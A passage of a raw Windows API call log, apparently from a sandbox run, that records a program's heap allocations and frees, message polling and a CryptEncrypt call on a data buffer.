Flags=0x0, Size=0x4) returned 0x43e2540 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.963] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0117.963] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0117.963] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0117.963] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0117.964] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0117.964] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.964] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0117.964] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0117.964] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0117.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0117.965] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.965] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x747e) returned 0x452bda8 [0117.966] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caa00 [0117.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.967] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x747e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x7480) returned 1 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0117.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0117.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0117.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0117.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.970] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0117.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0117.971] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0117.971] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.971] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0117.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0117.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.972] HeapFree (in: hHeap=0x1780000, 